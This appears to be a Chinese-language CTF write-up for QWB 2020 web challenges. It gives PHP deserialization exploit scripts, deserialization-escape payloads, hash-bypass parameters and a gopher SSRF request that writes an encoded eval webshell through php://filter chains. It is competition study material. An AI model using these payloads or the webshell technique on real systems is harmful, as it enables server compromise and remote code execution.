强网杯2020 writeup
原文地址:http://phoebe233.cn/?p=242
被二进制爷爷们带飞Orz
Web
half_infiltration
首先反序列化,由于print之后无论走哪都会有ob_end_clean(),永远也不会输出,所以尝试输出之后让他报错来绕过
这样global$$this就会输出并报错
传入两个User,一个输出,一个报错绕过ob_end_clean()
<?php
$flag='flag{aaaa}';
class Pass
{
function read()
{
ob_start();
global $result;
print $result;
}
}
class User
{
public $age,$sex,$num;
function __destruct()
{
$student = $this->age;
$boy = $this->sex;
$a = $this->num;
$student->$boy();
if(!(is_string($a)) ||!(is_string($boy)) || !(is_object($student)))
{
ob_end_clean();
exit();
}
global $$a;
$result=$GLOBALS['flag'];
//ob_end_clean();
}
}
if (isset($_GET['x'])) {
unserialize($_GET['x']);
}
$a=new Pass();
$b=new User();
$c=new User();
$c->age=$a;
$c->sex="read";
$c->num="this";
$b->age=$a;
$b->sex="read";
$b->num='result';
echo urlencode(serialize([$b,$c]));
读到ssrf.php
内网端口探测为40000,内网服务:
源码处看到form表单,题目告知有uploads文件夹,猜测是文件上传处,发现phpsessid会创建一个文件夹,然后想写shell时发现有过滤,file这里可以用二次url绕一些字符,然后大小写绕base64过滤,content文件内容也有过滤,还把PD9给ban了,考虑用phpfilter组合过滤器绕
生成gopher打40000端口
gopher://127.0.0.1:40000/_POST%2520/index.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250ACookie%253A%2520PHPSESSID%253Dbv2afbkkbbpgkio8tjmai40ob7%250AContent-Length%253A%2520174%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AConnection%253A%2520close%250d%250A%250Afile%253Dphp%253A//filter/%25252577rite%253Dstring.rot13%257Cconvert.Base64-decode%257Cconvert.iconv.utf-7.utf-8/resource%253D1.php%2526content%253DK0FEdz9waHAgZXZhbCgrQUNRQVh3LUdFVCtBRnMtMCtBRjApK0FEcz8rQUQ0LQ
命令执行需要二次编码
这过滤也是挺狠
强网先锋
web辅助
反序列化逃逸,安恒月赛都有类似的题了,没意思
class player{
protected $user;
protected $pass;
protected $admin;
public function __construct($user, $pass, $admin = 0){
$this->user = $user;
$this->pass = $pass;
$this->admin = $admin;
}
public function get_admin(){
return $this->admin;
}
}
class topsolo{
protected $name;
public function __construct($name = 'Riven'){
$this->name = $name;
}
public function TP(){
if (gettype($this->name) === "function" or gettype($this->name) === "object"){
$name = $this->name;
$name();
}
}
public function __wakeup(){
$this->TP();
}
}
class midsolo{
protected $name;
public function __construct($name){
$this->name = $name;
}
public function __wakeup(){
if ($this->name !== 'Yasuo'){
$this->name = 'Yasuo';
echo "No Yasuo! No Soul!\n";
}
}
public function __invoke(){
$this->Gank();
}
public function Gank(){
if (stristr($this->name, 'Yasuo')){
echo "Are you orphan?\n";
}
else{
echo "Must Be Yasuo!\n";
}
}
}
class jungle{
protected $name = "";
public function __construct($name = "Lee Sin"){
$this->name = $name;
}
public function KS(){
phpinfo();
}
public function __toString(){
$this->KS();
return "";
}
}
function read($data){
$data = str_replace('\0*\0', chr(0)."*".chr(0), $data);
return $data;
}
function write($data){
$data = str_replace(chr(0)."*".chr(0), '\0*\0', $data);
return $data;
}
$d=new jungle(NULL);
$c=new midsolo($d);
$b=new topsolo($c);
$payload=(serialize($b));
$a="\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0";
//$username='\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0';
$b='";s:7:"0*0pass";s:0:"";s:8:"0*0admin";'.$payload;
echo $b."\n";
echo read(write(serialize(new player($a,$b))))."\n";
payload
?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=";s:7:"%00*%00pass";s:0:"";s:8:"%00*%00admin";O:7:"topsolo":2:{S:7:"\00*\00\6e\61\6d\65";O:7:"midsolo":1:{S:7:"\00*\00\6e\61\6d\65";O:6:"jungle":1:{S:7:"\00*\00\6e\61\6d\65";N
funhash
?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop
主动
cat f*
